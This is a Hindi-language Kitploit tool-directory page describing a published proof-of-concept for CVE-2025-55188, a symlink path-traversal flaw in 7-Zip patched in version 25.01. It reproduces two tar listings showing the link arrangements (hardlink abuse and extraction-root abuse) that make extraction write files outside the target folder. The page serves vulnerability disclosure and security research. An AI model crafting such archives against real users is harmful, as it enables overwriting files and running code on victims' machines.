Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2025-55188 — CVE-2025-55188 के लिए प्रूफ-ऑफ-कॉन्सेप्ट एक्सप्लॉइट जो सिमलिंक पथ ट्रैवर्सल के माध्यम से 7-Zip में मनमानी फ़ाइल लेखन प्रदर्शित करता है, और मनमाने कोड निष्पादन तक वृद्धि के साथ। | Kitploit
उपकरण/GitHubGitHub/lunbun/cve-2025-55188
भेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगपेलोड डेवलपमेंटबाइनरी शोषण
GitHublunbun/cve-2025-55188

CVE-2025-55188

CVE-2025-55188 के लिए प्रूफ-ऑफ-कॉन्सेप्ट एक्सप्लॉइट जो सिमलिंक पथ ट्रैवर्सल के माध्यम से 7-Zip में मनमानी फ़ाइल लेखन प्रदर्शित करता है, और मनमाने कोड निष्पादन तक वृद्धि के साथ।

रिपॉजिटरी देखें
8114 महीने पहलेअभी तक समीक्षित नहीं
वेबसाइट

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2025-55188: 7-Zip में मनमाना फ़ाइल लेखन

CVE-2025-55188 का प्रूफ-ऑफ-कॉन्सेप्ट, 7-Zip में एक मनमाना फ़ाइल लेखन। संस्करण 25.01 में पैच किया गया, जो 3 अगस्त 2025 को जारी हुआ।

नोट: CVE-2025-55188, CVE-2025-11001 से भिन्न है।

जिस संस्करण में CVE-2025-11001 को पैच किया गया था (संस्करण 25.00) वह अभी भी असुरक्षित है प्रतीकात्मक लिंक हमलों के माध्यम से मनमाना कोड निष्पादन के लिए CVE-2025-55188 के कारण।

CVE-2025-55188 की खोज और प्रकाशन CVE-2025-11001 के प्रकाशन से पहले किया गया था।

अधिक विस्तृत विवरण और लेख के लिए https://lunbun.dev/blog/cve-2025-55188/ देखें।

यह भेद्यता काफी सीधी है।

पथ ट्रैवर्सल सिमलिंक के माध्यम से मनमाने ढंग से फ़ाइलें लिखने के लिए किया जाता है। वहां से, महत्वपूर्ण फ़ाइलों में लिखकर मनमाना फ़ाइल लेखन को मनमाना कोड निष्पादन तक बढ़ाया जा सकता है।

सिमलिंक सुरक्षा जाँचों में एक किनारे के मामले के कारण सिमलिंक पथ ट्रैवर्सल संभव है। मुझे ऐसा करने के दो तरीके मिले। अधिक जानकारी के लिए ब्लॉग पोस्ट देखें।

पथ ट्रैवर्सल विधि 1: हार्डलिंक का दुरुपयोग

निम्नलिखित .tar फ़ाइल निष्कर्षण पर ../a/b/file.txt में लिखेगी:

root@kitploit:~
$ tar -tvf write.tar
lrw-r--r-- 0/0               0 1969-12-31 16:00 a/link -> ../a/b
hrwxr-xr-x 0/0               0 1969-12-31 16:00 link link to a/link
-rw-r--r-- 0/0              44 1969-12-31 16:00 link/file.txt

poc_hardlink हार्डलिंक विधि का उपयोग करने वाला कोड शामिल है।

पथ ट्रैवर्सल विधि 2: निष्कर्षण रूट सुविधा का दुरुपयोग

निम्नलिखित .tar फ़ाइल निष्कर्षण पर ../file.txt में लिखेगी (केवल लिनक्स पर):

root@kitploit:~
$ tar -tvf write.tar
lrw-r--r-- 0/0               0 1969-12-31 16:00 a/b/link -> /a
lrw-r--r-- 0/0               0 1969-12-31 16:00 link -> a/b/link/../../
-rw-r--r-- 0/0              44 1969-12-31 16:00 link/file.txt

poc_extraction_root निष्कर्षण रूट विधि का उपयोग करने वाला कोड शामिल है।

टूल डाउनलोड करें